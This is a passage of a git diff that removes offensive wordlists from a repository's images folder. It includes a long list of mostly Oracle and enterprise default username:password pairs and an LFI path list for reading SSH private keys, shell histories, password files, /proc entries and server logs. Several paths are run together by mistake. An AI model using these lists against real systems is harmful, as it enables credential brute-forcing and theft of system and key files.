-ODM_MTR:MTRPW
-odm:odm
-ODM:ODM
-odscommon:odscommon
-ODSCOMMON:ODSCOMMON
-ods:ods
-ODS:ODS
-ods_server:ods_server
-ODS_SERVER:ODS_SERVER
-oe:change_on_install
-OE:CHANGE_ON_INSTALL
-oemadm:oemadm
-OEMADM:OEMADM
-oemrep:oemrep
-OEMREP:OEMREP
-oe:oe
-OE:OE
-oe:unknown
-OE:UNKNOWN
-okb:okb
-OKB:OKB
-okc:okc
-OKC:OKC
-oke:oke
-OKE:OKE
-oki:oki
-OKI:OKI
-OKL:OKL
-oko:oko
-OKO:OKO
-okr:okr
-OKR:OKR
-oks:oks
-OKS:OKS
-okx:okx
-OKX:OKX
-OL810:OL810
-OL811:OL811
-OL812:OL812
-OL9:OL9
-olapdba:olapdba
-OLAPDBA:OLAPDBA
-olapsvr:instance
-OLAPSVR:INSTANCE
-olapsvr:olapsvr
-OLAPSVR:OLAPSVR
-olapsys:manager
-OLAPSYS:MANAGER
-olapsys:olapsys
-OLAPSYS:OLAPSYS
-omwb_emulation:oracle
-OMWB_EMULATION:ORACLE
-ont:ont
-ONT:ONT
-oo:oo
-OO:OO
-openspirit:openspirit
-OPENSPIRIT:OPENSPIRIT
-opi:opi
-OPI:OPI
-ORABAM:ORABAM
-ORABAMSAMPLES:ORABAMSAMPLES
-ORABPEL:ORABPEL
-oracache:oracache
-ORACACHE:ORACACHE
-oracle:oracle
-ORACLE:ORACLE
-oradba:oradbapass
-ORADBA:ORADBAPASS
-ORAESB:ORAESB
-ORAOCA_PUBLIC:ORAOCA_PUBLIC
-oraprobe:oraprobe
-ORAPROBE:ORAPROBE
-oraregsys:oraregsys
-ORAREGSYS:ORAREGSYS
-ORASAGENT:ORASAGENT
-orasso_ds:orasso_ds
-ORASSO_DS:ORASSO_DS
-orasso:orasso
-ORASSO:ORASSO
-orasso_pa:orasso_pa
-ORASSO_PA:ORASSO_PA
-orasso_ps:orasso_ps
-ORASSO_PS:ORASSO_PS
-orasso_public:orasso_public
-ORASSO_PUBLIC:ORASSO_PUBLIC
-orastat:orastat
-ORASTAT:ORASTAT
-orcladmin:welcome
-ORCLADMIN:WELCOME
-ordcommon:ordcommon
-ORDCOMMON:ORDCOMMON
-ordplugins:ordplugins
-ORDPLUGINS:ORDPLUGINS
-ordsys:ordsys
-ORDSYS:ORDSYS
-ose$http$admin:invalid
-OSE$HTTP$ADMIN:INVALID
-ose$http$admin:invalid:password
-OSE$HTTP$ADMIN:Invalid password
-osm:osm
-OSM:OSM
-osp22:osp22
-OSP22:OSP22
-ota:ota
-OTA:OTA
-outln:outln
-OUTLN:OUTLN
-owa:owa
-OWA:OWA
-owa_public:owa_public
-OWA_PUBLIC:OWA_PUBLIC
-OWAPUB:OWAPUB
-owf_mgr:owf_mgr
-OWF_MGR:OWF_MGR
-owner:owner
-OWNER:OWNER
-ozf:ozf
-OZF:OZF
-ozp:ozp
-OZP:OZP
-ozs:ozs
-OZS:OZS
-PABLO:PABLO
-PAIGE:PAIGE
-PAM:PAM
-panama:panama
-PANAMA:PANAMA
-pa:pa
-PA:PA
-PARRISH:PARRISH
-PARSON:PARSON
-PATORILY:PATORILY
-PAT:PAT
-PATRICKSANCHEZ:PATRICKSANCHEZ
-patrol:patrol
-PATROL:PATROL
-PATSY:PATSY
-PAULA:PAULA
-paul:paul
-PAUL:PAUL
-PAXTON:PAXTON
-PCA1:PCA1
-PCA2:PCA2
-PCA3:PCA3
-PCA4:PCA4
-PCS1:PCS1
-PCS2:PCS2
-PCS3:PCS3
-PCS4:PCS4
-PD7333:PD7333
-PD7334:PD7334
-PD810:PD810
-PD811:PD811
-PD812:PD812
-PD9:PD9
-PDA1:PDA1
-PEARL:PEARL
-PEG:PEG
-PENNY:PENNY
-PEOPLE:PEOP1E
-PERCY:PERCY
-perfstat:perfstat
-PERFSTAT:PERFSTAT
-PERRY:PERRY
-perstat:perstat
-PERSTAT:PERSTAT
-PETE:PETE
-PEYTON:PEYTON
-PHIL:PHIL
-PJI:PJI
-pjm:pjm
-PJM:PJM
-planning:planning
-PLANNING:PLANNING
-plex:plex
-PLEX:PLEX
-plsql:supersecret
-PLSQL:SUPERSECRET
-pm:change_on_install
-PM:CHANGE_ON_INSTALL
-pmi:pmi
-PMI:PMI
-pm:pm
-PM:PM
-pm:unknown
-PM:UNKNOWN
-pn:pn
-PN:PN
-po7:po7
-PO7:PO7
-po8:po8
-PO8:PO8
-poa:poa
-POA:POA
-POLLY:POLLY
-pom:pom
-POM:POM
-PON:PON
-po:po
-PO:PO
-portal30_admin:portal30_admin
-PORTAL30_ADMIN:PORTAL30_ADMIN
-portal30_demo:portal30_demo
-PORTAL30_DEMO:PORTAL30_DEMO
-portal30:portal30
-PORTAL30:PORTAL30
-portal30:portal31
-PORTAL30:PORTAL31
-portal30_ps:portal30_ps
-PORTAL30_PS:PORTAL30_PS
-portal30_public:portal30_public
-PORTAL30_PUBLIC:PORTAL30_PUBLIC
-portal30_sso_admin:portal30_sso_admin
-PORTAL30_SSO_ADMIN:PORTAL30_SSO_ADMIN
-portal30_sso:portal30_sso
-PORTAL30_SSO:PORTAL30_SSO
-portal30_sso_ps:portal30_sso_ps
-PORTAL30_SSO_PS:PORTAL30_SSO_PS
-portal30_sso_public:portal30_sso_public
-PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC
-PORTAL_APP:PORTAL_APP
-portal_demo:portal_demo
-PORTAL_DEMO:PORTAL_DEMO
-PORTAL:PORTAL
-PORTAL_PUBLIC:PORTAL_PUBLIC
-portal_sso_ps:portal_sso_ps
-PORTAL_SSO_PS:PORTAL_SSO_PS
-pos:pos
-POS:POS
-powercartuser:powercartuser
-POWERCARTUSER:POWERCARTUSER
-PPM1:PPM1
-PPM2:PPM2
-PPM3:PPM3
-PPM4:PPM4
-PPM5:PPM5
-primary:primary
-PRIMARY:PRIMARY
-PRISTB733:PRISTB733
-PRISTCTL:PRISTCTL
-PRISTDTA:PRISTDTA
-PRODB733:PRODB733
-PRODCTL:PRODCTL
-PRODDTA:PRODDTA
-PRODUSER:PRODUSER
-PROJMFG:WELCOME
-PRP:PRP
-PS810CTL:PS810CTL
-PS810DTA:PS810DTA
-PS810:PS810
-PS811CTL:PS811CTL
-PS811DTA:PS811DTA
-PS811:PS811
-PS812CTL:PS812CTL
-PS812DTA:PS812DTA
-PS812:PS812
-psa:psa
-PSA:PSA
-PSBASS:PSBASS
-psb:psb
-PSB:PSB
-PSEM:PSEM
-PSFTDBA:PSFTDBA
-PSFT:PSFT
-psp:psp
-PSP:PSP
-PS:PS
-PTADMIN:PTADMIN
-PTCNE:PTCNE
-PTDMO:PTDMO
-PTE:PTE
-PTESP:PTESP
-PTFRA:PTFRA
-PTGER:PTGER
-PTG:PTG
-PTJPN:PTJPN
-PTUKE:PTUKE
-PTUPG:PTUPG
-PTWEB:PTWEB
-PTWEBSERVER:PTWEBSERVER
-pubsub1:pubsub1
-PUBSUB1:PUBSUB1
-pubsub:pubsub
-PUBSUB:PUBSUB
-pv:pv
-PV:PV
-PY7333:PY7333
-PY7334:PY7334
-PY810:PY810
-PY811:PY811
-PY812:PY812
-PY9:PY9
-qa:qa
-QA:QA
-qdba:qdba
-QDBA:QDBA
-QOT:QOT
-qp:qp
-QP:QP
-QRM:QRM
-qs_adm:change_on_install
-QS_ADM:CHANGE_ON_INSTALL
-qs_adm:qs_adm
-QS_ADM:QS_ADM
-qs_adm:unknown
-QS_ADM:UNKNOWN
-qs_cbadm:change_on_install
-QS_CBADM:CHANGE_ON_INSTALL
-qs_cbadm:qs_cbadm
-QS_CBADM:QS_CBADM
-qs_cbadm:unknown
-QS_CBADM:UNKNOWN
-qs_cb:change_on_install
-QS_CB:CHANGE_ON_INSTALL
-qs_cb:qs_cb
-QS_CB:QS_CB
-qs_cb:unknown
-QS_CB:UNKNOWN
-qs:change_on_install
-QS:CHANGE_ON_INSTALL
-qs_cs:change_on_install
-QS_CS:CHANGE_ON_INSTALL
-qs_cs:qs_cs
-QS_CS:QS_CS
-qs_cs:unknown
-QS_CS:UNKNOWN
-qs_es:change_on_install
-QS_ES:CHANGE_ON_INSTALL
-qs_es:qs_es
-QS_ES:QS_ES
-qs_es:unknown
-QS_ES:UNKNOWN
-qs_os:change_on_install
-QS_OS:CHANGE_ON_INSTALL
-qs_os:qs_os
-QS_OS:QS_OS
-qs_os:unknown
-QS_OS:UNKNOWN
-qs:qs
-QS:QS
-qs:unknown
-QS:UNKNOWN
-qs_ws:change_on_install
-QS_WS:CHANGE_ON_INSTALL
-qs_ws:qs_ws
-QS_WS:QS_WS
-qs_ws:unknown
-QS_WS:UNKNOWN
-RENE:RENE
-repadmin:repadmin
-REPADMIN:REPADMIN
-rep_manager:demo
-REP_MANAGER:DEMO
-reports:reports
-REPORTS:REPORTS
-reports_user:oem_temp
-REPORTS_USER:OEM_TEMP
-rep_owner:demo
-REP_OWNER:DEMO
-rep_owner:rep_owner
-REP_OWNER:REP_OWNER
-rep_user:demo
-REP_USER:DEMO
-re:re
-RE:RE
-RESTRICTED_US:RESTRICTED_US
-rg:rg
-RG:RG
-rhx:rhx
-RHX:RHX
-rla:rla
-RLA:RLA
-rlm:rlm
-RLM:RLM
-RM1:RM1
-RM2:RM2
-RM3:RM3
-RM4:RM4
-RM5:RM5
-rmail:rmail
-RMAIL:RMAIL
-rman:rman
-RMAN:RMAN
-ROB:ROB
-RPARKER:RPARKER
-rrs:rrs
-RRS:RRS
-RWA1:RWA1
-SALLYH:SALLYH
-sample:sample
-SAMPLE:SAMPLE
-SAM:SAM
-sap:06071992
-SAP:06071992
-sapr3:sap
-SAPR3:SAP
-sap:sapr3
-SAP:SAPR3
-SARAHMANDY:SARAHMANDY
-SCM1:SCM1
-SCM2:SCM2
-SCM3:SCM3
-SCM4:SCM4
-scott:tiger
-SCOTT:TIGER
-scott:tigger
-SCOTT:TIGGER
-SDAVIS:SDAVIS
-sdos_icsap:sdos_icsap
-SDOS_ICSAP:SDOS_ICSAP
-secdemo:secdemo
-SECDEMO:SECDEMO
-SEDWARDS:SEDWARDS
-SELLCM:SELLCM
-SELLER:SELLER
-SELLTREAS:SELLTREAS
-serviceconsumer1:serviceconsumer1
-SERVICECONSUMER1:SERVICECONSUMER1
-SERVICES:WELCOME
-SETUP:SETUP
-sh:change_on_install
-SH:CHANGE_ON_INSTALL
-sh:sh
-SH:SH
-sh:unknown
-SH:UNKNOWN
-SID:SID
-si_informtn_schema:si_informtn_schema
-SI_INFORMTN_SCHEMA:SI_INFORMTN_SCHEMA
-siteminder:siteminder
-SITEMINDER:SITEMINDER
-SKAYE:SKAYE
-SKYTETSUKA:SKYTETSUKA
-slide:slidepw
-SLIDE:SLIDEPW
-SLSAA:SLSAA
-SLSMGR:SLSMGR
-SLSREP:SLSREP
-spierson:spierson
-SPIERSON:SPIERSON
-SRABBITT:SRABBITT
-SRALPHS:SRALPHS
-SRAY:SRAY
-SRIVERS:SRIVERS
-SSA1:SSA1
-SSA2:SSA2
-SSA3:SSA3
-SSC1:SSC1
-SSC2:SSC2
-SSC3:SSC3
-SSOSDK:SSOSDK
-ssp:ssp
-SSP:SSP
-SSS1:SSS1
-starter:starter
-STARTER:STARTER
-strat_user:strat_passwd
-STRAT_USER:STRAT_PASSWD
-SUPPLIER:SUPPLIER
-SVM7333:SVM7333
-SVM7334:SVM7334
-SVM810:SVM810
-SVM811:SVM811
-SVM812:SVM812
-SVM9:SVM9
-SVMB733:SVMB733
-SVP1:SVP1
-swpro:swpro
-SWPRO:SWPRO
-swuser:swuser
-SWUSER:SWUSER
-SY810:SY810
-SY811:SY811
-SY812:SY812
-SY9:SY9
-sympa:sympa
-SYMPA:SYMPA
-sys:0racl3
-SYS:0RACL3
-sys:0racl38
-SYS:0RACL38
-sys:0racl38i
-SYS:0RACL38I
-sys:0racl39
-SYS:0RACL39
-sys:0racl39i
-SYS:0RACL39I
-sys:0racle
-SYS:0RACLE
-sys:0racle8
-SYS:0RACLE8
-sys:0racle8i
-SYS:0RACLE8I
-sys:0racle9
-SYS:0RACLE9
-sys:0racle9i
-SYS:0RACLE9I
-SYS7333:SYS7333
-SYS7334:SYS7334
-sysadmin:sysadmin
-SYSADMIN:SYSADMIN
-sysadm:sysadm
-SYSADM:SYSADM
-SYSB733:SYSB733
-sys:change_on_install
-SYS:CHANGE_ON_INSTALL
-sys:d_syspw
-SYS:D_SYSPW
-sys:manag3r
-SYS:MANAG3R
-sys:manager
-SYS:MANAGER
-sysman:oem_temp
-SYSMAN:OEM_TEMP
-sysman:sysman
-SYSMAN:SYSMAN
-SYSMAN:WELCOME1
-sys:oracl3
-SYS:ORACL3
-sys:oracle
-SYS:ORACLE
-sys:oracle8
-SYS:ORACLE8
-sys:oracle8i
-SYS:ORACLE8I
-sys:oracle9
-SYS:ORACLE9
-sys:oracle9i
-SYS:ORACLE9I
-sys:sys
-SYS:SYS
-sys:syspass
-SYS:SYSPASS
-system:0racl3
-SYSTEM:0RACL3
-system:0racl38
-SYSTEM:0RACL38
-system:0racl38i
-SYSTEM:0RACL38I
-system:0racl39
-SYSTEM:0RACL39
-system:0racl39i
-SYSTEM:0RACL39I
-system:0racle
-SYSTEM:0RACLE
-system:0racle8
-SYSTEM:0RACLE8
-system:0racle8i
-SYSTEM:0RACLE8I
-system:0racle9
-SYSTEM:0RACLE9
-system:0racle9i
-SYSTEM:0RACLE9I
-system:change_on_install
-SYSTEM:CHANGE_ON_INSTALL
-system:d_syspw
-SYSTEM:D_SYSPW
-system:d_systpw
-SYSTEM:D_SYSTPW
-system:manag3r
-SYSTEM:MANAG3R
-system:manager
-SYSTEM:MANAGER
-system:oracl3
-SYSTEM:ORACL3
-system:oracle
-SYSTEM:ORACLE
-system:oracle8
-SYSTEM:ORACLE8
-system:oracle8i
-SYSTEM:ORACLE8I
-system:oracle9
-SYSTEM:ORACLE9
-system:oracle9i
-SYSTEM:ORACLE9I
-system:system
-SYSTEM:SYSTEM
-system:systempass
-SYSTEM:SYSTEMPASS
-SYSTEM:WELCOME1
-SYS:WELCOME1
-tahiti:tahiti
-TAHITI:TAHITI
-talbot:mt6ch5
-TALBOT:MT6CH5
-TDEMARCO:TDEMARCO
-tdos_icsap:tdos_icsap
-TDOS_ICSAP:TDOS_ICSAP
-tec:tectec
-TEC:TECTEC
-TESTCTL:TESTCTL
-TESTDTA:TESTDTA
-test:passwd
-TEST:PASSWD
-testpilot:testpilot
-TESTPILOT:TESTPILOT
-test:test
-TEST:TEST
-test_user:test_user
-TEST_USER:TEST_USER
-thinsample:thinsamplepw
-THINSAMPLE:THINSAMPLEPW
-tibco:tibco
-TIBCO:TIBCO
-tip37:tip37
-TIP37:TIP37
-TRA1:TRA1
-tracesvr:trace
-TRACESVR:TRACE
-travel:travel
-TRAVEL:TRAVEL
-TRBM1:TRBM1
-TRCM1:TRCM1
-TRDM1:TRDM1
-TRRM1:TRRM1
-tsdev:tsdev
-TSDEV:TSDEV
-tsuser:tsuser
-TSUSER:TSUSER
-turbine:turbine
-TURBINE:TURBINE
-TWILLIAMS:TWILLIAMS
-UDDISYS:UDDISYS
-ultimate:ultimate
-ULTIMATE:ULTIMATE
-um_admin:um_admin
-UM_ADMIN:UM_ADMIN
-um_client:um_client
-UM_CLIENT:UM_CLIENT
-user0:user0
-USER0:USER0
-user1:user1
-USER1:USER1
-user2:user2
-USER2:USER2
-user3:user3
-USER3:USER3
-user4:user4
-USER4:USER4
-user5:user5
-USER5:USER5
-user6:user6
-USER6:USER6
-user7:user7
-USER7:USER7
-user8:user8
-USER8:USER8
-user9:user9
-USER9:USER9
-user_name:password
-USER_NAME:PASSWORD
-user:user
-USER:USER
-usuario:clave
-USUARIO:CLAVE
-utility:utility
-UTILITY:UTILITY
-utlbstatu:utlestat
-UTLBSTATU:UTLESTAT
-vea:vea
-VEA:VEA
-veh:veh
-VEH:VEH
-vertex_login:vertex_login
-VERTEX_LOGIN:VERTEX_LOGIN
-VIDEO31:VIDEO31
-VIDEO4:VIDEO4
-VIDEO5:VIDEO5
-videouser:videouser
-VIDEOUSER:VIDEOUSER
-vif_developer:vif_dev_pwd
-VIF_DEVELOPER:VIF_DEV_PWD
-viruser:viruser
-VIRUSER:VIRUSER
-VP1:VP1
-VP2:VP2
-VP3:VP3
-VP4:VP4
-VP5:VP5
-VP6:VP6
-vpd_admin:akf7d98s2
-VPD_ADMIN:AKF7D98S2
-vrr1:unknown
-VRR1:UNKNOWN
-vrr1:vrr1
-VRR1:VRR1
-vrr1:vrr2
-VRR1:VRR2
-WAA1:WAA1
-WAA2:WAA2
-WCRSYS:WCRSYS
-webcal01:webcal01
-WEBCAL01:WEBCAL01
-webdb:webdb
-WEBDB:WEBDB
-webread:webread
-WEBREAD:WEBREAD
-websys:manager
-WEBSYS:MANAGER
-WEBSYS:WELCOME
-webuser:your_pass
-WEBUSER:YOUR_PASS
-WENDYCHO:WENDYCHO
-west:west
-WEST:WEST
-wfadmin:wfadmin
-WFADMIN:WFADMIN
-wh:wh
-WH:WH
-wip:wip
-WIP:WIP
-WIRELESS:WELCOME
-WIRELESS:WIRELESS
-wkadmin:wkadmin
-WKADMIN:WKADMIN
-wkproxy:change_on_install
-WKPROXY:CHANGE_ON_INSTALL
-wkproxy:unknown
-WKPROXY:UNKNOWN
-wkproxy:wkproxy
-WKPROXY:WKPROXY
-wksys:change_on_install
-WKSYS:CHANGE_ON_INSTALL
-wksys:wksys
-WKSYS:WKSYS
-wk_test:wk_test
-WK_TEST:WK_TEST
-wkuser:wkuser
-WKUSER:WKUSER
-wms:wms
-WMS:WMS
-wmsys:wmsys
-WMSYS:WMSYS
-wob:wob
-WOB:WOB
-wps:wps
-WPS:WPS
-wsh:wsh
-WSH:WSH
-wsm:wsm
-WSM:WSM
-wwwuser:wwwuser
-WWWUSER:WWWUSER
-www:www
-WWW:WWW
-xademo:xademo
-XADEMO:XADEMO
-xdb:change_on_install
-XDB:CHANGE_ON_INSTALL
-XDO:XDO
-xdp:xdp
-XDP:XDP
-xla:xla
-XLA:XLA
-XLE:XLE
-XNB:XNB
-xnc:xnc
-XNC:XNC
-xni:xni
-XNI:XNI
-xnm:xnm
-XNM:XNM
-xnp:xnp
-XNP:XNP
-xns:xns
-XNS:XNS
-xprt:xprt
-XPRT:XPRT
-xtr:xtr
-XTR:XTR
-YCAMPOS:YCAMPOS
-YSANCHEZ:YSANCHEZ
-ZFA:ZFA
-ZPB:ZPB
-ZSA:ZSA
-ZX:ZX
diff --git a/src/images/legion (1).zip b/src/images/legion (1).zip
deleted file mode 100644
index 121303109..000000000
Binary files a/src/images/legion (1).zip and /dev/null differ
diff --git a/src/images/legion (2).zip b/src/images/legion (2).zip
deleted file mode 100644
index 91a2a7ac0..000000000
Binary files a/src/images/legion (2).zip and /dev/null differ
diff --git a/src/images/legion.zip b/src/images/legion.zip
deleted file mode 100644
index 121303109..000000000
Binary files a/src/images/legion.zip and /dev/null differ
diff --git a/src/images/lfi (1).txt b/src/images/lfi (1).txt
deleted file mode 100644
index dd887237f..000000000
--- a/src/images/lfi (1).txt
+++ /dev/null
@@ -1,430 +0,0 @@
-/apache/logs/access.log
-/apache/logs/access_log
-/apache/logs/error.log
-/apache/logs/error_log
-~/.atfp_history
-~/.bash_history
-~/.bash_logout
-~/.bash_profile
-~/.bashrc
-/bin/php.ini
-/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
-/etc/anaconda-ks.cfg
-/etc/anacrontab
-/etc/apache2/apache2.conf
-/etc/apache2/conf/httpd.conf
-/etc/apache/conf/httpd.conf
-/etc/at.allow
-/etc/at.deny
-/etc/bashrc
-/etc/bootptab
-/etc/centos-release
-/etc/cesi.conf
-/etc/chrootUsers
-/etc/chrootUsersvar/log/xferlog
-/etc/chttp.conf
-/etc/cron.allow
-/etc/cron.deny
-/etc/crontab
-/etc/cups/cupsd.conf
-/etc/debconf.conf
-/etc/debian_version
-/etc/dovecot/dovecot.passwd
-/etc/environment
-/etc/fstab
-/etc/ftpaccess
-/etc/groups
-/etc/grub.conf
-/etc/gshadow
-/etc/hostapd.conf
-/etc/hostname
-/etc/hosts.allow
-/etc/hosts.deny
-/etc/http/conf/httpd.conf
-/etc/httpd/access.conf
-/etc/httpd.conf
-/etc/httpd/srm.conf
-/etc/http/httpd.conf
-/etc/inetd.conf
-/etc/inittab
-/etc/lighttpd.conf
-/etc/lilo.conf
-/etc/logrotate.d/proftpd
-/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
-/etc/lsb-release
-/etc/master.passwd
-/etc/modules.conf
-/etc/motdetc/passwd
-/etc/mtab
-/etc/my.conf
-/etc/mysql/user.MYD
-/etc/netconfig
-/etc/network/interfaces
-/etc/networks
-/etc/npasswd
-/etc/ntp.conf
-/etc/os-release
-/etc/php4.4/fcgi/php.ini
-/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
-/etc/php4/apache/php.ini
-/etc/php5/cgi/php.ini
-/etc/php/apache/php.ini
-/etc/php/cgi/php.ini
-/etc/php.ini
-/etc/php/php4/php.ini
-/etc/php/php4/php.inietc/php/apache/php.ini
-/etc/polkit-1/localauthority.conf.d/50-localauthority.conf
-/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf
-/etc/printcap
-/etc/proftpd/modules.confvar/log/vsftpd.log
-/etc/proftpd/proftpd.conf
-/etc/protocols
-/etc/protpd/proftpd.conf
-/etc/pureftpd.passwd
-/etc/pureftpd.pdb
-/etc/pureftpd.pdbetc/pureftpd.passwd
-/etc/pure-ftpd/pureftpd.pdb
-/etc/pure-ftpd/putreftpd.pdb
-/etc/rsyncd.conf
-/etc/rsyslog.conf
-/etc/redhat-release
-/etc/samba/smb.conf
-/etc/security/environetc/security/limits
-/etc/security/group
-/etc/security/passwd
-/etc/security/user
-/etc/services
-/etc/shells
-/etc/snmpd.conf
-/etc/ssh/ssh_host_ecdsa_key
-/etc/ssh/ssh_host_ecdsa_key.pub
-/etc/ssh/ssh_host_key
-/etc/ssh/ssh_host_key.pub
-/etc/ssh/ssh_host_rsa_key
-/etc/ssh/ssh_host_rsa_key.pub
-/etc/sudoers
-/etc/supervisord.conf
-/etc/sysconfig/network
-/etc/sysctl.conf
-/etc/syslog.conf
-/etc/system-release
-/etc/termcap
-/etc/timezone
-/etc/tomcat/tomcat-users.xml
-/etc/updatedb.conf
-~/.gtkrc
-/local/apache2/conf/httpd.conf
-/log/apache2/error_log
-~/.login
-~/.logout
-/logs/access.log
-/logs/access_log
-/logs/error.log
-/logs/error_log
-/logs/security_debug_log
-/logs/security_log
-~/.mysql_history
-~/.nano_history
-/opt/apache2/conf/httpd.conf
-/opt/apache/conf/httpd.conf
-/opt/lampp/etc/httpd.conf
-/opt/lampp/logs/access.log
-/opt/lampp/logs/access_log
-/opt/lampp/logs/error_log
-/opt/lampp/logs/error.logopt
-/opt/xampp/logs/access.log
-/opt/xampp/logs/error.log
-/opt/xampp/logs/error_log
-/php4php.ini
-/php5php.ini
-~/.php_history
-/phpphp.ini
-/PHPphp.ini
-/private/etc/httpd/httpd.conf
-/private/etc/httpd/httpd.conf.
-/proc/cpuinfo
-/proc/filesystems
-/proc/interrupts
-/proc/ioports
-/proc/meminfo
-/proc/modules
-/proc/self/cmdline
-/proc/self/cwd/index.php
-/proc/self/fd/0
-/proc/self/fd/1
-/proc/self/fd/10
-/proc/self/fd/100
-/proc/self/fd/11
-/proc/self/fd/12
-/proc/self/fd/13
-/proc/self/fd/14
-/proc/self/fd/15
-/proc/self/fd/16
-/proc/self/fd/17
-/proc/self/fd/18
-/proc/self/fd/19
-/proc/self/fd/2
-/proc/self/fd/20
-/proc/self/fd/21
-/proc/self/fd/22
-/proc/self/fd/23
-/proc/self/fd/24
-/proc/self/fd/25
-/proc/self/fd/26
-/proc/self/fd/27
-/proc/self/fd/28
-/proc/self/fd/29
-/proc/self/fd/3
-/proc/self/fd/30
-/proc/self/fd/31
-/proc/self/fd/32
-/proc/self/fd/33
-/proc/self/fd/34
-/proc/self/fd/35
-/proc/self/fd/36
-/proc/self/fd/37
-/proc/self/fd/38
-/proc/self/fd/39
-/proc/self/fd/4
-/proc/self/fd/41
-/proc/self/fd/42
-/proc/self/fd/43
-/proc/self/fd/44
-/proc/self/fd/45
-/proc/self/fd/46
-/proc/self/fd/47
-/proc/self/fd/48
-/proc/self/fd/49
-/proc/self/fd/5
-/proc/self/fd/51
-/proc/self/fd/52
-/proc/self/fd/53
-/proc/self/fd/54
-/proc/self/fd/55
-/proc/self/fd/56
-/proc/self/fd/57
-/proc/self/fd/58
-/proc/self/fd/59
-/proc/self/fd/6
-/proc/self/fd/61
-/proc/self/fd/62
-/proc/self/fd/63
-/proc/self/fd/64
-/proc/self/fd/65
-/proc/self/fd/66
-/proc/self/fd/67
-/proc/self/fd/68
-/proc/self/fd/69
-/proc/self/fd/7
-/proc/self/fd/71
-/proc/self/fd/72
-/proc/self/fd/73
-/proc/self/fd/74
-/proc/self/fd/75
-/proc/self/fd/76
-/proc/self/fd/77
-/proc/self/fd/78
-/proc/self/fd/79
-/proc/self/fd/8
-/proc/self/fd/81
-/proc/self/fd/82
-/proc/self/fd/83
-/proc/self/fd/84
-/proc/self/fd/85
-/proc/self/fd/86
-/proc/self/fd/87
-/proc/self/fd/88
-/proc/self/fd/89
-/proc/self/fd/9
-/proc/self/fd/91
-/proc/self/fd/92
-/proc/self/fd/93
-/proc/self/fd/94
-/proc/self/fd/95
-/proc/self/fd/96
-/proc/self/fd/97
-/proc/self/fd/98
-/proc/self/fd/99
-/proc/self/net/arp
-/proc/self/stat
-/proc/self/status
-/proc/self/statvar
-/proc/stat
-/proc/swaps
-~/.profile
-/root/anaconda-ks.cfg
-/root/.bash_history
-/root/.ssh/authorized_hosts
-/root/.ssh/authorized_keys
-/root/.ssh/id_dsa
-/root/.ssh/id_rsa
-/root/.ssh/known_hosts
-~/.ssh/authorized_keys
-~/.ssh/id_dsa
-~/.ssh/id_dsa.pub
-~/.ssh/identity
-~/.ssh/identity.pub
-~/.ssh/id_rsa
-~/.ssh/id_rsa.pub
-/usr/apache2/conf/httpd.conf
-/usr/apache/conf/httpd.conf
-/usr/etc/pure-ftpd.conf
-/usr/lib/security/mkuser.default
-/usr/local/apache2/conf/httpd.conf
-/usr/local/apache2/log/error_log
-/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
-/usr/local/apache2/logs/error_log
-/usr/local/apache2/logs/error.logvar/log/access_log
-/usr/local/apache/audit_log
-/usr/local/apache/conf/modsec.conf
-/usr/local/apache/error.log
-/usr/local/apache/error_log
-/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
-/usr/local/apache/log
-/usr/local/apache/log/error_log
-/usr/local/apache/logs
-/usr/local/apache/logs/access.log
-/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
-/usr/local/apache/logs/error.log
-/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
-/usr/local/cpanel/logs/access_log
-/usr/local/cpanel/logs/login_log
-/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
-/usr/local/cpanel/logs/stats_log
-/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
-/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
-/usr/local/etc/apache/conf/httpd.conf
-/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
-/usr/local/etc/apache/vhosts.confetc/php.ini
-/usr/local/etc/httpd/logs/access_log
-/usr/local/etc/httpd/logs/error_log
-/usr/local/httpd/conf/httpd.conf
-/usr/local/lib/php.ini
-/usr/local/lib/php.iniusr/local/php/lib/php.ini
-/usr/local/php5/httpd.conf.php
-/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
-/usr/local/php/httpd.conf
-/usr/local/php/httpd.conf.ini
-/usr/local/php/httpd.conf.php
-/usr/local/php/lib/php.ini
-/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
-/usr/local/pureftpd/etc/pureftpd.pdn
-/usr/local/pureftpd/sbin/pure-config.pl
-/usr/local/www/logs/httpd_log
-/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
-/usr/ports/ftp/pure-ftpd/
-/usr/ports/net/pure-ftpd/
-/usr/sbin/pure-config.pl
-/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
-/usr/var/lib/mysql/debian.cnf
-/usr/var/lib/mysql/my.cnf
-/usr/var/lib/mysql/user.MYD
-/var/apache2/config.inc
-/var/apache/logs/access_log
-/var/apache/logs/error_log
-/var/htmp
-/var/lib/mysql/debian.cnf
-/var/lib/mysql/mysql/user.MYD
-/var/lib/mysql/user.MYD
-/var/local/www/conf/php.ini
-/var/local/www/conf/php.inietc/php/cgi/php.ini
-/var/log/access.log
-/var/log/apache2/access_log
-/var/log/apache2/access_logvar/log/httpd/error_log
-/var/log/apache2/error.log
-/var/log/apache2/error_log
-/var/log/apache/access_log
-/var/log/apache/error_log
-/var/log/apache-ssl/access.log
-/var/log/apache-ssl/error.log
-/var/log/auth.log
-/var/log/boot
-/var/log/chttp.log
-/var/log/cron.logvar/log/couchdb/couch.log
-/var/log/cups/error.log
-/var/log/daemon.log
-/var/log/debug
-/var/log/dmesg
-/var/log/dmessage
-/var/log/dpkg.log
-/var/log/error_log
-/var/log/error.logvar/log/apache/access_log
-/var/log/exim4/mainlog
-/var/log/exim4_mainlog
-/var/log/exim4/paniclog
-/var/log/exim/mainlog
-/var/log/exim/mainlogvar/log/maillog
-/var/log/exim.paniclog
-/var/log/exim/paniclog
-/var/log/faillog
-/var/log/ftp-proxy
-/var/log/ftp-proxy/ftp-proxy.log
